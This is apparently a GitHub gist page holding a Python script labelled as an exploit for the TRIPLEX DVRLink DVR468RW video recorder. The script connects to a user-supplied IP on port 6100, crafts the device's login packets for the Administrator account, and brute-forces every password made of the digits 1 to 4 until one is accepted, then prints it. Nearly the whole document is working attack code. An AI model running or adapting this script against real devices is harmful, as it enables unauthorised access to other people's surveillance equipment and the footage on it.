/DVR_exploit.py
Created Dec 22, 2016
TRIPLEX DVRLink DVR468RW Exploit
| #!/usr/bin/env python | |
| import socket | |
| import binascii | |
| import sys | |
| import time | |
| def passList(): | |
| n = 1 | |
| li = [1] | |
| while (int(li[-1]) <= 44444444): | |
| k = str_base(int(n)) | |
| if (k != 0): | |
| li.append(k) | |
| n = n + 1 | |
| return li | |
| def asctohex(string_in): | |
| a="" | |
| for x in string_in: | |
| a = a + ("0"+((hex(ord(x)))[2:]))[-2:] | |
| return(a) | |
| def getIP(): | |
| #Ask for IP | |
| while True: | |
| TCP_IP = input("Enter IP: ") | |
| try: | |
| socket.inet_aton(TCP_IP) | |
| break | |
| except socket.error: | |
| print("Error, Try Again") | |
| return TCP_IP | |
| def connect(to, port): | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect((to, port)) | |
| return s | |
| def makePassPacket(password): | |
| packet = '41444d494e4953545241544f5200' #14 bytes, username: Admininstrator | |
| packet += '0000eb030000920303000000000058d86701' #18 bytes of something... | |
| packet += asctohex(password) #4 password | |
| packet += '00' | |
| size = len(packet) | |
| need = 128-size #64 bits in hex | |
| junk = '010000eb03000092030300000000003c21f6064c9c6a0700000000000000000000'#bytes of something else | |
| packet += junk[0:need] | |
| return packet | |
| def str_base(num, base=5, numerals = '01234'): | |
| if base < 2 or base > len(numerals): | |
| raise ValueError("str_base: base must be between 2 and %i" % len(numerals)) | |
| result = '' | |
| while num: | |
| result = numerals[num % (base)] + result | |
| num //= base | |
| if result.count('0') > 0: | |
| return 0 | |
| return result | |
| TCP_IP = getIP() | |
| TCP_PORT = 6100 | |
| print('Generating password list..') | |
| passwords = passList() | |
| print('Running...') | |
| msg1=binascii.unhexlify('01010000') | |
| msg2=binascii.unhexlify('01010004') | |
| msg4=binascii.unhexlify('01200040') | |
| for password in passwords: | |
| s1 = connect(TCP_IP,TCP_PORT) | |
| #socket 1 data 1 | |
| s1.send(msg1) | |
| s1.settimeout(5) | |
| data1 = s1.recv(4) | |
| data2 = s1.recv(4) | |
| if (binascii.b2a_hex(data1) != b'02000008'): | |
| sys.exit("First packet incorect") | |
| s2 = connect(TCP_IP,TCP_PORT) | |
| #socket 2 data 1 | |
| s2.send(msg2) | |
| msg3=binascii.unhexlify(binascii.b2a_hex(data2)[0:8]) | |
| s2.send(msg3) | |
| s2.settimeout(5) | |
| data3 = s2.recv(4) | |
| data4 = s2.recv(8) | |
| if (binascii.b2a_hex(data3) != b'02000004'): | |
| sys.exit("Second packet incorect") | |
| #socket 1 data 2 | |
| passPacket = makePassPacket(str(password)) | |
| s1.send(msg4) | |
| s1.send(binascii.unhexlify(passPacket)) | |
| data5 = s1.recv(8) | |
| data6 = s1.recv(8) | |
| if (binascii.b2a_hex(data6) != b'02160000' ): | |
| print('Password:',password) | |
| sys.exit() | |
| time.sleep(0.1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment